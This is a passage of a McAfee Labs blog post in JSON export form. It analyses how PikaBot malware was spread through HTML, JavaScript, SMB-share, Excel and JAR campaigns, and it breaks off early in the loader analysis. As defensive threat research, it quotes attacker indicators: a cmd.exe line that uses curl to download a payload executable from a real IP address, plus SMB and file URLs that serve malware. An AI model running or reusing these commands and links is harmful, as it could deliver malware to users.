{"id":187631,"date":"2024-04-02T11:12:55","date_gmt":"2024-04-02T18:12:55","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=187631"},"modified":"2024-04-02T11:22:11","modified_gmt":"2024-04-02T18:22:11","slug":"distinctive-campaign-evolution-of-pikabot-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/distinctive-campaign-evolution-of-pikabot-malware\/","title":{"rendered":"Distinctive Campaign Evolution of Pikabot Malware"},"content":{"rendered":"<p><span style=\"color: #000000;\"><em>Authored by Anuradha and Preksha<\/em><\/span><\/p>\n<h2><span style=\"color: #000000;\">Introduction<\/span><\/h2>\n<p><span style=\"color: #000000;\">PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.<\/span><\/p>\n<h1><span style=\"color: #000000;\">Distribution Methods<\/span><\/h1>\n<p><span style=\"color: #000000;\">PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external <strong>Server Message Block (SMB)<\/strong> shares hosting malicious zip files.<\/span><\/p>\n<p><span style=\"color: #000000;\">SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.<\/span><\/p>\n<h2><span style=\"color: #000000;\">Distinctive Campaigns<\/span><\/h2>\n<p><span style=\"color: #000000;\">During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.<\/span><\/p>\n<p><span style=\"color: #000000;\">Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.<\/span><\/p>\n<p><span style=\"color: #000000;\">Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the <a style=\"color: #000000;\" href=\"https:\/\/www.hackread.com\/monikerlink-bug-microsoft-outlook-data-malware\/\">MonikerLink<\/a> bug and attaches an SMB link in the Outlook mail itself.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187634 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1.png\" alt=\"\" width=\"1093\" height=\"530\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1.png 1093w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1-300x145.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1-1024x497.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1-768x372.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-1-205x99.png 205w\" sizes=\"auto, (max-width: 1093px) 100vw, 1093px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 1. Distinctive Campaigns of Pikabot<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.<\/span><\/p>\n<ol>\n<li><span style=\"color: #000000;\"><strong>HTML<\/strong><\/span><\/li>\n<li><span style=\"color: #000000;\"><strong>Javascript<\/strong><\/span><\/li>\n<li><span style=\"color: #000000;\"><strong>SMB Share<\/strong><\/span><\/li>\n<li><span style=\"color: #000000;\"><strong>Excel<\/strong><\/span><\/li>\n<li><span style=\"color: #000000;\"><strong>JAR<\/strong><\/span><\/li>\n<\/ol>\n<p><span style=\"color: #000000;\"><strong>It is uncommon for an adversary to deploy so many attack vectors in the span of a month.<\/strong><\/span><\/p>\n<h3><span style=\"color: #000000;\">Campaign Analysis<\/span><\/h3>\n<p><span style=\"color: #000000;\">In this section, a comprehensive breakdown of the analysis for each campaign is presented below.<\/span><\/p>\n<h4><span style=\"color: #000000;\">1.HTML Campaign<\/span><\/h4>\n<p><span style=\"color: #000000;\"><strong>In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187649 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-2.png\" alt=\"\" width=\"866\" height=\"182\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-2.png 866w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-2-300x63.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-2-768x161.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-2-205x43.png 205w\" sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 2.HTML Code<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: &#8216;file:\/\/204.44.125.68\/mcqef\/yPXpC.txt&#8217;. This appears to be a file URL, pointing to a text file on a remote server.<\/span><\/p>\n<p><span style=\"color: #000000;\">Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:<\/span><\/p>\n<p><span style=\"color: #000000;\">Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.<\/span><\/p>\n<p><span style=\"color: #000000;\">Client-Side Execution: Meta tag refreshes occur on the client side (in the user&#8217;s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user&#8217;s machine, making detection and analysis more challenging.<\/span><\/p>\n<p><span style=\"color: #000000;\">Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.<\/span><\/p>\n<p><span style=\"color: #000000;\">In this campaign, McAfee blocks the HTML file.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187664 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-3.png\" alt=\"\" width=\"785\" height=\"369\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-3.png 785w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-3-300x141.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-3-768x361.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-3-205x96.png 205w\" sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 3.HTML file<\/strong><\/span><\/p>\n<h4><span style=\"color: #000000;\">2. Javascript Campaign<\/span><\/h4>\n<p><span style=\"color: #000000;\">Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Infection Chain:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">.zip-&gt;.js-&gt;curl-&gt;.exe<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Code snippet of .js file:<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187679 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-4.png\" alt=\"\" width=\"847\" height=\"552\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-4.png 847w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-4-300x196.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-4-768x501.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-4-198x129.png 198w\" sizes=\"auto, (max-width: 847px) 100vw, 847px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 4. Javascript Code<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.<\/span><\/p>\n<p><span style=\"color: #000000;\">Since the URL \u201chxxp:\/\/103.124.105.147\/KNaDVX\/.dat\u201d is inactive, the payload is not downloaded to the below location.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Commandline:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">&#8216;&#8221;C:\\Windows\\System32\\cmd.exe&#8221; \/c mkdir C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh &amp; curl hxxp:\/\/103.124.105.147\/KNaDVX\/0.2642713404338389.dat &#8211;output C:\\Dthfgjhjfj\\Rkfjsil\\Ejkjhdgjf\\Byfjgkgdfh\\Ngjhjhjda.exe&#8217;<\/span><\/p>\n<p><span style=\"color: #000000;\">McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187694 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-5.png\" alt=\"\" width=\"881\" height=\"349\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-5.png 881w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-5-300x119.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-5-768x304.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-5-205x81.png 205w\" sizes=\"auto, (max-width: 881px) 100vw, 881px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 5. JS file<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187709 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-6.png\" alt=\"\" width=\"902\" height=\"504\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-6.png 902w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-6-300x168.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-6-768x429.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-6-205x115.png 205w\" sizes=\"auto, (max-width: 902px) 100vw, 902px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 6. EXE file<\/strong><\/span><\/p>\n<h4><span style=\"color: #000000;\"><strong>3<\/strong><strong>.<\/strong><strong> SMB share Campaign:<\/strong><\/span><\/h4>\n<p><span style=\"color: #000000;\">In this campaign, Malware leverages the <a style=\"color: #000000;\" href=\"https:\/\/www.hackread.com\/monikerlink-bug-microsoft-outlook-data-malware\/\">MonikerLink<\/a> bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Infection Chain:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">EML -&gt;SMB share link-&gt;.zip-&gt;.exe<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Spam Email:<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187724 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-7.png\" alt=\"\" width=\"771\" height=\"500\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-7.png 771w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-7-300x195.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-7-768x498.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-7-199x129.png 199w\" sizes=\"auto, (max-width: 771px) 100vw, 771px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 7. Spam email with SMB share link<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">SMB Share link: file:\/\/newssocialwork.com\/public\/FNFY.zip<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187739 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-8.png\" alt=\"\" width=\"786\" height=\"404\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-8.png 786w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-8-300x154.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-8-768x395.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-8-205x105.png 205w\" sizes=\"auto, (max-width: 786px) 100vw, 786px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 8.<\/strong><strong> EXE file<\/strong><\/span><\/p>\n<h2><span style=\"color: #000000;\"><strong>\u00a0<\/strong><strong>4: Ex<\/strong><strong>cel Campaign<\/strong><\/span><\/h2>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187754 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-9.png\" alt=\"\" width=\"862\" height=\"354\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-9.png 862w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-9-300x123.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-9-768x315.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-9-205x84.png 205w\" sizes=\"auto, (max-width: 862px) 100vw, 862px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 9. Face in Excel<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Infection Chain:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">.zip &gt;.xls &gt; .js &gt; .dll<\/span><\/p>\n<p><span style=\"color: #000000;\">This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access &#8220;files from the cloud.&#8221;<\/span><\/p>\n<p><span style=\"color: #000000;\">Upon hovering over the &#8220;Open&#8221; button, we can notice an SMB file share link -file:\/\/\/\\\\85.195.115.20\\share\\reports_02.15.2024_1.js.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Bundled files in Excel:<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187769 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-10.png\" alt=\"\" width=\"593\" height=\"390\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-10.png 593w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-10-300x197.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-10-196x129.png 196w\" sizes=\"auto, (max-width: 593px) 100vw, 593px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 10. Bundled files inside Excel<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The Excel file doesn&#8217;t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.<\/span><\/p>\n<p><span style=\"color: #000000;\">The hyperlink is present in the below relationship file.<\/span><\/p>\n<p><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187784 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-11.png\" alt=\"\" width=\"774\" height=\"125\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-11.png 774w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-11-300x48.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-11-768x124.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-11-205x33.png 205w\" sizes=\"auto, (max-width: 774px) 100vw, 774px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 11. XML relationship file<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Content of relationship file:<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187799 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12.png\" alt=\"\" width=\"1803\" height=\"113\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12.png 1803w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12-300x19.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12-1024x64.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12-768x48.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12-1536x96.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-12-205x13.png 205w\" sizes=\"auto, (max-width: 1803px) 100vw, 1803px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 12.<\/strong><strong> xl\/drawings\/_rels\/drawing1.xml.rels <\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Code of JS file:<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187814 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-13.png\" alt=\"\" width=\"881\" height=\"399\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-13.png 881w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-13-300x136.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-13-768x348.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-13-205x93.png 205w\" sizes=\"auto, (max-width: 881px) 100vw, 881px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 13. Obfuscated javascript code<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as \u201cnh.jpg\u201d.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187829 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-14.png\" alt=\"\" width=\"515\" height=\"66\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-14.png 515w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-14-300x38.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-14-205x26.png 205w\" sizes=\"auto, (max-width: 515px) 100vw, 515px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 14. Calling regsvr32.exe<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The downloaded DLL payload is executed by regsvr32.exe.<\/span><\/p>\n<p><span style=\"color: #000000;\">In this campaign, McAfee blocks the XLSX file.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187844 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-15.png\" alt=\"\" width=\"871\" height=\"420\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-15.png 871w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-15-300x145.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-15-768x370.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-15-205x99.png 205w\" sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 15. XLSX file<\/strong><\/span><\/p>\n<h4><span style=\"color: #000000;\"><strong>5.JAR<\/strong><strong> Campaign<\/strong><\/span><\/h4>\n<p><span style=\"color: #000000;\">In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.<\/span><\/p>\n<p><span style=\"color: #000000;\"><strong>Infection Chain:<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">.zip&gt;.jar&gt;.dll<\/span><\/p>\n<p><span style=\"color: #000000;\">On extraction, the below files are found inside the jar file.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187859 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-16.png\" alt=\"\" width=\"678\" height=\"220\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-16.png 678w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-16-300x97.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-16-205x67.png 205w\" sizes=\"auto, (max-width: 678px) 100vw, 678px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 16. Extraction of JAR file<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">The <strong>MANIFEST<\/strong> file indicates that <strong>hBHGHjbH.class<\/strong> serves as the Main-Class in the provided files.<\/span><\/p>\n<p><span style=\"color: #000000;\">The jar file on execution loads the file <strong>\u201c163520\u201d<\/strong> as a resource and drops it <strong>as .png<\/strong> to the <strong>%temp%<\/strong> location which is the payload DLL file.<\/span><\/p>\n<p><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187874 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-17.png\" alt=\"\" width=\"683\" height=\"146\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-17.png 683w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-17-300x64.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-17-205x44.png 205w\" sizes=\"auto, (max-width: 683px) 100vw, 683px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 17. Payload with .png extension<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Following this, java.exe initiates the execution of regsvr32.exe to run the payload.<\/span><\/p>\n<p><span style=\"color: #000000;\">In this campaign, McAfee blocks both the JAR and DLL files.<\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187904 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19.png\" alt=\"\" width=\"637\" height=\"314\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19.png 637w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-300x148.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-205x101.png 205w\" sizes=\"auto, (max-width: 637px) 100vw, 637px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 18. JAR file<\/strong><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187919 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-1.png\" alt=\"\" width=\"637\" height=\"314\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-1.png 637w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-1-300x148.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-19-1-205x101.png 205w\" sizes=\"auto, (max-width: 637px) 100vw, 637px\" \/><\/span><\/center><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 19. DLL file<\/strong><\/span><\/p>\n<h1><span style=\"color: #000000;\">Pikabot Payload Analysis:<\/span><\/h1>\n<h2><span style=\"color: #000000;\">Pikabot loader:<\/span><\/h2>\n<p><span style=\"color: #000000;\">Due to a relatively high entropy of the resource section, the sample appears packed.<\/span><\/p>\n<p><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187934 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-20.png\" alt=\"\" width=\"573\" height=\"352\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-20.png 573w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-20-300x184.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-20-205x126.png 205w\" sizes=\"auto, (max-width: 573px) 100vw, 573px\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><strong>Figure 20. Loader Entropy<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.<\/span><br \/>\n<span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-187964\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-22-300x222.png\" alt=\"\" width=\"300\" height=\"222\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-22-300x222.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-22-174x129.png 174w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-22.png 489w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/span><\/p>\n<p><center><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-187949 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-21.png\" alt=\"\" width=\"476\" height=\"501\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Figure-21.png 476w, 